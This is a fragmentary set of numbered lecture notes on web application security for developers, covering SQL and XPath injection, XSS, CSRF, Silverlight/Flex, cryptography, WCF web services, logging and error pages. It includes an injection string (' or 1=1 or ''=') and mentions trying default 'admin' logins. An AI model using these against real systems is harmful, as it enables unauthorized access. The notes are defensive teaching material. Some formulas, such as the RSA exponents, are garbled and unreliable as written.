32. They are bots (automated scanners) from Virus vendors, Security organizations, search engines and more cataloging all web sites.
33. There is the famous GoogleBot, http://en.wikipedia.org/wiki/Googlebot, that will look for the local robots.txt, see http://www.robotstxt.org/ , to define what to search for on the web site. Hackers usually don’t respect these gentlemen agreements on the Internet.
34. There are so many scans on the Internet that many consider it white noise and careers have been built dedicated on sifting through the network traffics white noise.
35.
36.
37. A well known site containing a database of various keywords is found at http://www.hackersforcharity.org/ghdb/ .
62. For example, a username and password is asked for on the Web page and the web page will pass it to the database to validate the information.
63. Some applications will not validate the field adequately before passing it to the database, and the database will process whatever it will receive.
64. Hackers will pass SQL commands directly to the database, and in some cases tables like “passwords” are returned because the SQL commands are not being filtered adequately.
69. Blind SQL Injection is performed when a hacker passes SQL commands into the web form and generic errors are returned to the user, for instance a “404” Error page or page not found. The hacker has to make more extensive guesses on the database behind the web server.
107. The problem with using Javascript is the same as its purpose, the script can execute any script in the HTML browser, however, it may also execute any script put into its place.
108. Hackers can use Javascript to alert the browser to go to a different website, input some extra data, or even access data on the browser itself like browser cookies or the session information in the browser.
109. The hacker takes advantage of changing the information in the <script> … </script> tags.
110.
111.
112. If it has to be turned off because of legitimate reasons, it can be replaced by coding pieces of the Anti-XSS 3.1 library.
113.
114. The XSS Library can be broken down into two pieces, a library of protection routines (using Microsoft.Security.Application) and also a a Security Runtime Engine (SRE) Configuration Utility.
115. The library routines will Encode the output so that it will not execute if passing from an external field.
122. Different types of XSS have evolved so that new ones are being discovered in the wild constantly.
123.
124.
125. The benefit to the attacker, is that if a hidden image is injected into a user’s browser, and their browser currently has their bank authentication cookie, then the hacker may hijack the victims authentication.
126.
127. A reference could be many items like an “image (<img>)” or even an XMLHTTP object. http://www.cgisecurity.com/csrf-faq.htm
141. JSON is sometimes used in transfer of data, like in Ajax, instead of XML.
142. JSON is used instead of XML because it has a smaller file footprint and can be read easily into Javascript.
143. JSON is normally defined by using the mime type “application/json” and also by using the file type “.json”.
144.
145. Data is usually retrieved using the XMLHttpRequest (XHR) object from the server asynchronously.
146. Javascript (ECMAScript) is used for local processing, and the Document Object Model (DOM) is used to access the data inside the page or read XML from the server. This means that the browser only sends and receives the parts that it needs to change and tries to process some data locally.
150. The browser has to interpret the Javascript regardless of how it is encoded and decoded. If a browser can read the Javascript, then the Javascript can be debugged/monitored and manipulated using a JavaScript reverser to intercept the functions.
160. Flex uses the Flash plugin for running it’s GUI program. http://flex.org/
161. Silverlight programs use the Silverlightplugin for running its environment. http://www.silverlight.net/
162. So the hacking tools normally have to have the plugin in the client as well to talk to these technologies, including Web Scanners.
163. Many of the attacks will now not only be limited to the Flex or Silverlightdeployement but also to the plugin as well.
164.
165. They both can communicate and work with Javascript, therefore they could be susceptible to any XSS form of attack.
166.
167. Flex uses MXML, the Macromedia XML, as a declarative layout of the interfaces to compile into the SWF file that is deployed.
168. To extend the MXML, Flex uses a language called ActionScript, which is similar to Java. ActionScript can be called from the MXML file using the <mx:script> tag.
176. It then downloads the XAP file that contains your application. This file uses the standard .zip compression.
177. The Silverlight plug-in reads the AppManifest.xml file from the XAP to find out what assemblies your application uses. It creates the Silverlight runtime environment and then loads your application assembly (along with any dependent assemblies).
178. The Silverlight plug-in creates an instance of your custom application class (which is defined in the App.xaml and App.xaml.cs files).
179. The default constructor of the application class raises the Startup event.
180. Your application handles the Startup event and creates the root visual object for your application.
181.
182. SilverlightApplication3TestPage.aspx – This is a ASP page that will need to be deployed on a Web server to test the Silverlight project SilverlightApplication3. This can be used a entry point into the Silverlight Application.
183. SilverlightApplication1TestPage.html – This is a HTML page that will need to be deployed on a Web server to test the Silverlight project SilverlightApplication3. This can be used a entry point into the Silverlight Application.
192. When a system is in production, and especially on the Internet, there is no guarantee that you know who is watching the data transmitted between the user and the server. This may also apply to the Local Area Network as well.
193. Never take it for granted that access cannot be broken.
194. Always, use common algorithms that come with Java. Common algorithms are tested well and are vetted by millions.
195. Keep the keys as secure as the data, because they can unlock the data.
196.
197. The one-way hash generates a fixed size hash some given any size data.
198. The data cannot be reversed engineered from the hash, hence one-way.
200. Different data generates different hash sums.(Note: In rare cases, collisions, different data generates the same sum).
201.
202. The 128 bit hash sum can be used to ensure if there has been tampering of data or a file.
203.
204.
205.
206.
207. The Rijndael algorithm was selected, developed by two Belgian cryptographers, Joan Daemen and Vincent Rijmen.
208. The NIST adapted the variable key space into 128, 192, or 256 bits as FIPS 197 and called it AES.
209.
210. The Asymmetric algorithm can generate key pairs, one private key for encrypting, and its pair is handed out for decryption to more people, the public key.
211.
212. RSA Keys, a simple encrypt/decrypt public key = (e, n) = (17, 3233) private key = (d, n) = ( 2753, 3233) To compute the ciphertext we use C = Pe (mod n). For example, P = 65 and is the letter ‘H’. C = 2790 = 6517 mod 3233. Back to Plaintext, P = Cd mod n. P = 65 = 27902753 mod 3233. Which returns 65 for ‘H’.
218. A larger, combined, piece is the Digital Certificate.
219. A Digital Certificate is a protocol X509 structure that contains verification of the certificate, Non-repudiation (proof of receipt), and third party authentication through a Certificate Authority.
220. The Digital Certificate is the heart of Hypertext Transfer Protocol over Secure Socket Layer (HTTPS) and Public Key Infrastructure (PKI).
221. PKI is the process of authentication through a trusted party called Certificate Authority (CA). This could be a third party or self signed internally through a domain controller.
222.
223.
224.
225. Websites can get accessed by typing in “admin” “admin” at times, and auditors try a range of default and well known logins.
226.
227.
228. The eXtensible Markup Language (XML) defines the interfaces and content of the message.
229.
230.
231. UDDI provides for discovery of services and retrieval of their WSDL descriptions as a directory service. This service may require authentication and encrypt the HTTP protocol.
232. The UDDI will return the WSDL and forward the client to the proxy that will contain the service, usually in the form of a URL.
233. The WSDL will define the acceptable interface into the SOA.
234. The client SOAP call will format the acceptable XML. SOAP will act as an envelope to the SOA.
235. The SOA will accept the call if it meets the WSDL criteria and process the call.
242. A guide for writing Secure Web Services can be found at http://wcfsecurityguide.codeplex.com/releases/view/15892
243. Like other frameworks, for example Apache’s Axis2, WCF also supports Authentication, Authorization, Secure Transport, Tokens and Signatures in Web Services. The difference is that WCF is fully integrated into .NET.
246. There are several types of bindings, Http, MSMQ, TCP, etc. These are the communication protocols being used, for instance SOAP over TCP. The Bindings help support end-to-end security for the Web Service.
247. The contract is the service contract that the service will expose for the various clients.
248. WCF also is strongly typed, or even untyped messaging, built on top of .NET.
249.
250.
251.
252.
253.
254.
255.
256. Start by creating a Console Application in C#, then add the “System.ServiceModel” reference and associated “using System.ServiceModel” in the Program.cs.
264. The difference between hacking Web Services, is that the attacks are transmitted in the XML field, which is similar to HTML, instead of an HTML form field.
265. In other words, the XML must be parsed out to enter an attack in the “username” text field in the XML format instead of the “username” GUI form field in HTML.
266.
267. It uses path to traverse traverse through the nodes of an XML document to look for specific information.
268. Xpath injection is similar to SQL injection except that the query strings are slightly different and it uses XML as its attack vector.
269. One example is to pass ‘ or 1=1 or ‘ ‘=‘ as the username to fake the database into a valid username:
313. With efficient logging of authorization, access to secure information, and any anomalous interaction with the system, a proper recovery of the system is usually insured.
314. The logs should be store into a different system in case the Web system is ever compromised, one where the Web system sends them but never asks for them back.
318. There are 3 components of handling an exception, and they are the “try”, “catch” and “finally” blocks.
319. The “try” block will throw an exception from normal code, the “catch” block will catch the exception and handle it, and the “finally” block will process the cleanup afterwards.
320. The “catch” block can log the anomaly, stop the program, or process it in a hundred different ways.
324. Even though the basic CLR logging framework can accept changes on destination through its Handler in the “logging.properties”, Log4Net offers more advanced features in its XML use of its Appender class.
325. Log4Net supports XML configuration and a text configuration in log4Net.properties.
332. An error page giving details, like a database or table name, may be more than enough to give an attacker enough information launch an attack at the website.
335. Web Error pages…. Many web sites use the default error pages that show the user exceptions and even exceptions into the database. The database exceptions have a tendency to display table names and invalid SQL statements that can be used for further probing. To send all errors to a custom Error page, the web.config file for IIS: <customErrors mode="On" defaultRedirect="errors/ErrorPage.aspx"></customErrors>